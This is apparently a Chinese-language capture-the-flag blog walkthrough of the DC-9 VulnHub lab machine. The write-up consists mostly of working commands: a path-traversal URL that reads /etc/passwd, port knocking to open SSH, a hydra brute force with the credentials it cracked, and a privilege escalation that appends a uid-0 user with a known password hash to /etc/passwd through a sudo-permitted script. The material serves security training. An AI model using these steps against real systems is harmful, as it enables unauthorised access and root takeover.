首页 > 其他分享 >DC-9

DC-9

时间:2022-08-18 01:34:54浏览次数:57  
标签:178.135 .. DC 192.168 dict ssh test

1、文件包含:

http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd

  

2、敲门服务:

http://192.168.178.135/manage.php?file=../../../../../../../../../etc/knockd.conf
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
敲门的判断
nmap -P 22 192.168.178.135
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http

nc -nv 192.168.178.135 7469
nc -nv 192.168.178.135 8475
nc -nv 192.168.178.135 9842

或者
nmap -p 7469 192.168.178.135
nmap -p 8475 192.168.178.135
nmap -p 9842 192.168.178.135

nmap -P 22 192.168.178.135
PORT STATE SERVICE
22/tcp open ssh //已经打开
80/tcp open http

3、hydra暴力破解SSH用户名密码:

hydra -L user-dict -P pass-dict 192.168.178.135 ssh
或者hydra -L user-dict -P pass-dict ssh://192.168.178.135

[22][ssh] host: 192.168.178.135 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.178.135 login: janitor password: Ilovepeepee

4、SSH登录

ssh [email protected]

ls -a //发现隐藏文件目录.secrets-for-putin/passwords-found-on-post-it-notes.txt
打开发现密码字典
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
加入pass-dict继续重新破解
hydra -L user-dict -P pass-dict 192.168.178.135 ssh
发现另一个用户(登录)
ssh [email protected] --B4-Tru3-001
sudo -l
发现发现可以无密码root身份运行test脚本
cd /opt/devstuff/dist/test/
./test
Usage: python test.py read append

find / -name test.py 2>/dev/null //发现文件/opt/devstuff/test.py

 

fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)

else :
f = open(sys.argv[1], "r")
output = (f.read())

f = open(sys.argv[2], "a")
f.write(output)
f.close()

  

//分析文件,作用将一个文件内容追加到另一个文件中
怎么办?分析可以创建一个拥有root权限的新用户,再将信息通过这个test.py写入到/etc/passwd
干吧!


5、使用openssl先创建一个本地加密用户

openssl passwd -1 -salt admin 123456
// -1 的意思是使用md5加密算法
// -salt 自动插入一个随机数作为文件内容加密

 

$1$admin$LClYcRe.ee8dQwgrFc5nz.

 

6、提权

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test/
sudo ./test /tmp/passwd /etc/passwd 追加root权限的用户
su admin 输入密码123456
whoami
cd /root
ls -a
cat theflag.txt

 

标签:178.135,..,DC,192.168,dict,ssh,test
From: https://www.cnblogs.com/boomomg/p/16597383.html

相关文章

  • stm32的ADC采样(基于HAL库)
    什么是ADC转换? CUBEMX配置ADC时需要注意的几个点:1.   adc采样的精度最高位数是16位。 这个设置是微秒级别的。所以不影响。 ......
  • [BJDCTF2020]Mark loves cat-1|源代码泄露|变量覆盖
    主要考察了:源代码泄露、变量覆盖共展示了三种获取flag的方式1、打开题目查看未发现有效信息,查看源代码信息,发现返回的dog信息,结果如下:2、使用dirmap进行目录扫描,发现......
  • 力扣|Q1834单线程CPU-SingleThreadedCPU
    Q1834SingleThreadedCPU简介给你一个二维数组tasks,用于表示n​​​​​​项从0到n-1编号的任务。其中tasks[i]=[enqueueTimei,processingTimei]意味着第i......
  • SQL的DDL,DML,DCL和DQL解释
    DDL(defination):数据定义语言,定义数据库对象:数据库、表、列常用的create/alter/drop1.数据库创建数据库createdatabasedb_name[characterset编码方式][collate......
  • nerdctl+buildkitd构建容器镜像
    搭建nerdctl+buildkitd环境: 安装nerdctl:wgethttps://github.com/containerd/nerdctl/releases/download/v0.22.0/nerdctl-0.22.0-linux-amd64.tar.gztar-zxvfne......
  • DNS 管理工具 rndc
    ubuntu20.04的docker环境rndc报错解决http://blog.chinaunix.net/uid-30212356-id-5143959.htmlrndc简介和使用说明https://www.jianshu.com/p/f08cf7cebf3fhttps......
  • DML、DDL、DCL
    D是Data,L是language中间字母分别是M:manipulation操纵,操作D:definition定义C:control控制在执行commit、DDL、DCL、exit、conn语句之后会进行自动提交事务;rollback、q......
  • Vulnhub | DC-1
    靶场地址https://www.vulnhub.com/entry/dc-1,292/信息搜集探查IP因为下载的镜像打开是一个登录界面,无法知道它的IP地址,所以这里需要借助一下VMware的特性,查看网络适......
  • Eight---pytorch学习---广播机制(broadcast)
    pytorch学习(5)广播机制(broadcast)矩阵运算往往都是在两个维度相同或者相匹配(前面矩阵的列数等于后一个矩阵的行数)的矩阵之间定义的,广播机制亦是如此。在机器学习的某......